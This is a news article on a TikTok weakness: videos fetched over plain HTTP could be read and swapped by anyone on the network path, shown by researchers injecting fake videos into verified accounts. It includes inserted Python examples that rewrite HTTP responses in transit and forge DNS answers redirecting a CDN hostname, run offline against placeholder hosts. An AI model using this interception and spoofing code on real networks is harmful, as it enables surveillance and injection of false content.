Picture this: you’re scrolling through your TikTok feed one day and all of a sudden, you notice a video that you did not upload posted to your account.
It’s entirely possible: a pair of software developers discovered a weakness in the viral social video platform that lets an attacker sitting on the network path swap the videos a user sees on any TikTok account.
In a post sharing their findings, developers Tommy Mysk and Talal Haj Bakry explain that TikTok uses Content Delivery Networks, or CDNs, to move its data around the world more efficiently. To improve performance, these CDNs transfer the data over plain HTTP.
The problem with choosing unencrypted HTTP over the more secure HTTPS is that every device between the app and the CDN can read, and rewrite, the traffic, which puts users’ privacy at risk.
“Any router between the TikTok app and TikTok’s CDNs can easily list all the videos that a user has downloaded and watched, exposing their watch history,” write Mysk and Bakry. “Public Wi-Fi operators, Internet Service Providers, and intelligence agencies can collect this data without much effort.”
Apple and Google have both moved to require apps to use encrypted HTTPS by default (Apple through App Transport Security on iOS, Google by blocking cleartext traffic by default since Android 9), but both platforms still let developers opt out, either for specific domains or for all of an app’s traffic, which is how HTTP traffic can persist.
Because TikTok transfers data such as videos and profile photos via HTTP, the developers found the traffic was susceptible to man-in-the-middle attacks. Basically, anyone between the app and the CDN can alter the content in transit and swap out a real video on an account for a fake one of their choosing.
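The two consequences described above, passive collection of watch history and active substitution of a video, both follow from the same fact: an HTTP/1.1 request and response are readable and editable bytes on the wire. The following is an added example (not code from the Mysk/Bakry post or from TikTok) that models what an on-path device such as a router does with a cleartext capture. The hostnames (`cdn.example-video.invalid`, `api.example-video.invalid`), request bytes and response bytes are constructed placeholders; the `watch_history` and `swap_body` functions are illustrative names, not any real tool.

```python
# Added example (not from the Mysk/Bakry post or TikTok's code): what an
# on-path device such as a router sees, and can change, when an app fetches
# media over cleartext HTTP. All request/response bytes and hostnames below
# are constructed placeholders for this example.


def _split_message(raw: bytes):
    """Split a raw HTTP/1.1 message into (start line, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0], headers, body


def watch_history(captured_requests):
    """Reconstruct every media object fetched, from nothing but the wire bytes.

    This is all a Wi-Fi operator or ISP needs to list what a user watched:
    cleartext GET requests carry the Host header and the path in the open.
    """
    history = []
    for raw in captured_requests:
        start, headers, _ = _split_message(raw)
        method, target, _ = start.split(b" ", 2)
        if method == b"GET":
            history.append(f"http://{headers.get('host', '')}{target.decode()}")
    return history


def swap_body(raw_response: bytes, new_body: bytes) -> bytes:
    """Replace the body of a cleartext HTTP response in transit.

    The status line and Content-Type are kept so the client still treats the
    payload as a video; Content-Length is rewritten (or added) to match.
    """
    head, _, _ = raw_response.partition(b"\r\n\r\n")
    out, seen_length = [], False
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line, seen_length = b"Content-Length: %d" % len(new_body), True
        out.append(line)
    if not seen_length:
        out.append(b"Content-Length: %d" % len(new_body))
    return b"\r\n".join(out) + b"\r\n\r\n" + new_body


def parse_response(raw: bytes):
    """Parse a response the way a client would, honouring Content-Length."""
    start, headers, body = _split_message(raw)
    length = int(headers.get("content-length", len(body)))
    return {"status": start.decode(), "headers": headers, "body": body[:length]}


# Constructed capture: three cleartext requests as a router would see them.
CAPTURE = [
    b"GET /video/abc123.mp4 HTTP/1.1\r\nHost: cdn.example-video.invalid\r\n"
    b"User-Agent: ExampleApp/1.0\r\n\r\n",
    b"GET /avatar/user42.jpg HTTP/1.1\r\nHost: cdn.example-video.invalid\r\n\r\n",
    b"POST /api/like HTTP/1.1\r\nHost: api.example-video.invalid\r\n"
    b"Content-Length: 2\r\n\r\n{}",
]

# Constructed CDN response for the first request (12-byte stand-in body).
REAL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: video/mp4\r\nContent-Length: 12\r\n\r\n"
    b"REAL_VIDEO__"
)

if __name__ == "__main__":
    for url in watch_history(CAPTURE):
        print("watched:", url)
    forged = swap_body(REAL_RESPONSE, b"FAKE_VIDEO_BYTES")
    print(parse_response(forged))
```

Note what the client has no way to notice: the forged response is syntactically a normal `200 OK` with the original `Content-Type`, so the app plays it. Over HTTPS the same router sees only TLS records and the server name, cannot recover the paths for `watch_history`, and any modified bytes fail the record's integrity check before the app ever parses them.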
The developers showed just how serious this can be by staging a DNS spoofing attack on a local network.
Using the weakness they discovered, the duo uploaded a video sharing coronavirus misinformation and injected it into the World Health Organization’s TikTok account so that it appeared to be one of the organization’s own videos. Using the same process, they displayed fraudulent uploads on other verified TikTok accounts, such as the Red Cross and the video platform’s own official profile.
To do this, the duo needed to trick the TikTok app into connecting to a fake server they had set up to mimic TikTok’s CDN servers.
“This can be achieved by actors who have direct access to the routers that users are connected to,” they explain in their post.
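The redirection step described above is ordinary DNS spoofing: a responder on the local network answers the app’s lookup for the CDN hostname with the attacker’s own address, so the app then sends its cleartext requests to the fake server. The following is an added example (not code from the Mysk/Bakry post) that builds and parses such an exchange entirely offline. The hostname `cdn.example-video.invalid` and the address `192.0.2.10` (from the TEST-NET-1 documentation range) are placeholders, and the function names are this example’s own; winning the race against the legitimate resolver, or controlling the router’s DNS settings as the quoted post assumes, is outside what is shown here.

```python
# Added example (not from the Mysk/Bakry post): a minimal DNS responder of
# the kind used to redirect an app's CDN lookup to an attacker-controlled
# server on a local network. Hostname and IP are placeholders (192.0.2.10 is
# from the TEST-NET-1 documentation range); no real resolver is contacted.
import socket
import struct

DNS_TYPE_A = 1


def encode_name(name: str) -> bytes:
    """Encode a hostname in DNS wire format (length-prefixed labels)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(pkt: bytes, off: int):
    """Decode a wire-format name at `off`, following compression pointers."""
    labels = []
    while True:
        ln = pkt[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:  # pointer to an earlier copy of the name
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            labels.append(decode_name(pkt, ptr)[0])
            return ".".join(labels), off + 2
        labels.append(pkt[off + 1:off + 1 + ln].decode())
        off += 1 + ln


def build_query(txid: int, name: str, qtype: int = DNS_TYPE_A) -> bytes:
    """Build the query an app's resolver sends for `name` (RD flag set)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def spoof_response(query: bytes, attacker_ip: str, ttl: int = 60):
    """Answer a captured A query with the attacker's address.

    The transaction ID and question are echoed back so the client accepts
    the answer; the pointer 0xC00C refers to the name in the question.
    Returns None for anything other than an A query.
    """
    txid = struct.unpack("!H", query[:2])[0]
    _, off = decode_name(query, 12)
    qtype, _ = struct.unpack("!HH", query[off:off + 4])
    if qtype != DNS_TYPE_A:
        return None
    question = query[12:off + 4]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR=1, RD, RA
    rr = struct.pack("!HHIH", DNS_TYPE_A, 1, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + b"\xC0\x0C" + rr


def parse_answers(resp: bytes):
    """Parse a response as a client would: (txid, [(name, ip, ttl), ...])."""
    txid, _, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", resp[:12])
    off = 12
    for _ in range(qdcount):
        _, off = decode_name(resp, off)
        off += 4  # skip QTYPE and QCLASS
    answers = []
    for _ in range(ancount):
        name, off = decode_name(resp, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
        off += 10
        rdata, off = resp[off:off + rdlen], off + rdlen
        if rtype == DNS_TYPE_A:
            answers.append((name, socket.inet_ntoa(rdata), ttl))
    return txid, answers


if __name__ == "__main__":
    q = build_query(0x1234, "cdn.example-video.invalid")
    forged = spoof_response(q, "192.0.2.10")
    print(parse_answers(forged))
```

The reason this works against a cleartext CDN and not an HTTPS one is worth spelling out: DNS only controls which server the app talks to. With HTTPS, the rogue server would also have to present a certificate valid for the CDN hostname, which it cannot obtain, so the TLS handshake fails before any video bytes are exchanged. With plain HTTP there is no such check, and the spoofed address is all the attacker needs.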
In practice, this means that to see the changes made by Mysk and Bakry in the TikTok app, a user would have to be connected to the researchers’ router. To be clear, the video swapping isn’t occurring on TikTok’s servers. But that doesn’t mean a malicious actor couldn’t use this method to cause real harm.
“If a popular DNS server was hacked to include a corrupt DNS record…misleading information, fake news, or abusive videos would be viewed on a large scale,” the developers explained. “This is not completely impossible.”
Developer Tommy Mysk confirmed to Mashable that the choice to transfer data via HTTP over HTTPS sets TikTok apart from most of its high-profile competitors.
“I just tested them all: Facebook, Instagram, YouTube, Twitter, Snapchat,” Mysk said in a message to Mashable. “They have ZERO HTTP traces. They transfer all of their data using HTTPS.”
Earlier this year, cybersecurity firm Check Point disclosed a number of security flaws in the TikTok app, including one that allowed hackers to take control of a user’s account. The viral video platform moved to fix them. Shortly after, Mysk and Bakry disclosed another TikTok security issue: the app was reading the contents of users’ iPhone clipboards.
TikTok has always had to prove itself as a safe platform for its users because of its ties to its China-based parent company, ByteDance. Some U.S. government workers have even been barred from using the app. This latest security issue surely isn’t good news for the company.